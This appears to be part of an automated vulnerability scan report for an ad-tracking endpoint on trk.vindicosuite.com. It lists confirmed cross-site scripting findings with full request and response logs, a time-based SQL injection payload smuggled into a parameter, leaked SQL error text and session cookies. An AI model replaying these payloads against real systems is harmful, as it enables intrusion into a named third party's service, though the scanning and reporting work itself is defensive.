Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=LDBJNNMCABPMNILEJEAPHNCE; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=EDJCEANCLPKGGNJLHBHNGIOD
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:22:37 GMT
Expires: Sat, 12 Feb 2011 20:22:13 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 741
Connection: keep-alive
<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 1;WAITFOR DELAY '0:0:25'--, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '749124199', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:22:37 GMT
Expires: Sat, 12 Feb 2011 20:22:13 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 741
Connection: keep-alive
<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 1;WAITFOR DELAY '0:0:25'--, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '749124199', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Cross-site Scripting
Cross-site Scripting
5
TOTAL
IMPORTANT
CONFIRMED
5
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
Remedy References
External References
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ CONFIRMED |
Parameters
| Parameter | Type | Value |
| siteId | GET | '"--></style></script><script>alert(0x000013)</script> |
| syndicationOutletId | GET | 47146 |
| campaignId | GET | 6330 |
| adRotationId | GET | 15121 |
| bannerCreativeAdModuleId | GET | 21152 |
| redirect | GET | http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917 |
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH; ASPSESSIONIDQAAADSBA=HIINFANCHFBLCJFCFEFNMOEC; ASPSESSIONIDCQCBDRCC=DKGGEANCJLOCCBCIDAOMLFHK; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=BPBKOFNCFIKEKJBNOBINOEAA; ASPSESSIONIDACBASSRC=IJOONFNCKDCDHPFJPMJCJJMN; ASPSESSIONIDCAADQSTC=BLEHOFNCAIJNFGHLABMKDIHM; ASPSESSIONIDSATQDCAA=LMNDFNMCBGCMEPFMEOKPALAP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=AOAPLANCGIFOMJNCAFAFFOLP; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=OLAHEOMCOLAOLKEMGGLPAFLB; ASPSESSIONIDCQCDBSCB=KFJGIOMCLELHCEGMAALEGGOA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=BLAJNNMCMCBFFHOBOOJDKKPJ; ASPSESSIONIDASRADQQC=GIKGOFNCENIMOKAKMGAPIBBD; ASPSESSIONIDCSCAASBD=OJBGEBNCCNPIBIKLFCLBMNHF; ASPSESSIONIDSQSTQBAA=BGMKLANCDAABMFICMLOACMBB; ASPSESSIONIDCSQRRDDD=IDJCEANCGLCFPGHCBNNOIDNI
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH; ASPSESSIONIDQAAADSBA=HIINFANCHFBLCJFCFEFNMOEC; ASPSESSIONIDCQCBDRCC=DKGGEANCJLOCCBCIDAOMLFHK; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=BPBKOFNCFIKEKJBNOBINOEAA; ASPSESSIONIDACBASSRC=IJOONFNCKDCDHPFJPMJCJJMN; ASPSESSIONIDCAADQSTC=BLEHOFNCAIJNFGHLABMKDIHM; ASPSESSIONIDSATQDCAA=LMNDFNMCBGCMEPFMEOKPALAP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=AOAPLANCGIFOMJNCAFAFFOLP; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=OLAHEOMCOLAOLKEMGGLPAFLB; ASPSESSIONIDCQCDBSCB=KFJGIOMCLELHCEGMAALEGGOA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=BLAJNNMCMCBFFHOBOOJDKKPJ; ASPSESSIONIDASRADQQC=GIKGOFNCENIMOKAKMGAPIBBD; ASPSESSIONIDCSCAASBD=OJBGEBNCCNPIBIKLFCLBMNHF; ASPSESSIONIDSQSTQBAA=BGMKLANCDAABMFICMLOACMBB; ASPSESSIONIDCSQRRDDD=IDJCEANCGLCFPGHCBNNOIDNI
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:47 GMT
Expires: Sat, 12 Feb 2011 20:10:48 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 692
Connection: keep-alive
<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>netsparker(0x000013)</script>, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '753209138', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:47 GMT
Expires: Sat, 12 Feb 2011 20:10:48 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 692
Connection: keep-alive
<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>netsparker(0x000013)</script>, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '753209138', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ CONFIRMED |
Parameters
| Parameter | Type | Value |
| siteId | GET | 1860 |
| syndicationOutletId | GET | '"--></style></script><script>alert(0x000014)</script> |
| campaignId | GET | 6330 |
| adRotationId | GET | 15121 |
| bannerCreativeAdModuleId | GET | 21152 |
| redirect | GET | http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917 |
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000014)%3C/script%3E&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=BLAJNNMCMCBFFHOBOOJDKKPJ; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=IDJCEANCGLCFPGHCBNNOIDNI
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=BLAJNNMCMCBFFHOBOOJDKKPJ; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=IDJCEANCGLCFPGHCBNNOIDNI
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:48 GMT
Expires: Sat, 12 Feb 2011 20:10:49 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 691
Connection: keep-alive
<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = '"--></style></script><script>netsparker(0x000014)</script>, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '752213686', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:48 GMT
Expires: Sat, 12 Feb 2011 20:10:49 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 691
Connection: keep-alive
<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = '"--></style></script><script>netsparker(0x000014)</script>, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '752213686', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ CONFIRMED |
Parameters
| Parameter | Type | Value |
| siteId | GET | 1860 |
| syndicationOutletId | GET | 47146 |
| campaignId | GET | '"--></style></script><script>alert(0x000015)</script> |
| adRotationId | GET | 15121 |
| bannerCreativeAdModuleId | GET | 21152 |
| redirect | GET | http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917 |
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000015)%3C/script%3E&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=BLAJNNMCMCBFFHOBOOJDKKPJ; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=IDJCEANCGLCFPGHCBNNOIDNI
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=BLAJNNMCMCBFFHOBOOJDKKPJ; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=IDJCEANCGLCFPGHCBNNOIDNI
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:50 GMT
Expires: Sat, 12 Feb 2011 20:10:50 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 692
Connection: keep-alive
<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 21152, @campaignId = '"--></style></script><script>netsparker(0x000015)</script>, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '753209146', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:50 GMT
Expires: Sat, 12 Feb 2011 20:10:50 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 692
Connection: keep-alive
<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 21152, @campaignId = '"--></style></script><script>netsparker(0x000015)</script>, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '753209146', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ CONFIRMED |
Parameters
| Parameter | Type | Value |
| siteId | GET | 1860 |
| syndicationOutletId | GET | 47146 |
| campaignId | GET | 6330 |
| adRotationId | GET | '"--></style></script><script>alert(0x000016)</script> |
| bannerCreativeAdModuleId | GET | 21152 |
| redirect | GET | http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917 |
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=6330&adRotationId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000016)%3C/script%3E&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=BLAJNNMCMCBFFHOBOOJDKKPJ; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=IDJCEANCGLCFPGHCBNNOIDNI
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=BLAJNNMCMCBFFHOBOOJDKKPJ; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=IDJCEANCGLCFPGHCBNNOIDNI
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:51 GMT
Expires: Sat, 12 Feb 2011 20:10:52 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 691
Connection: keep-alive
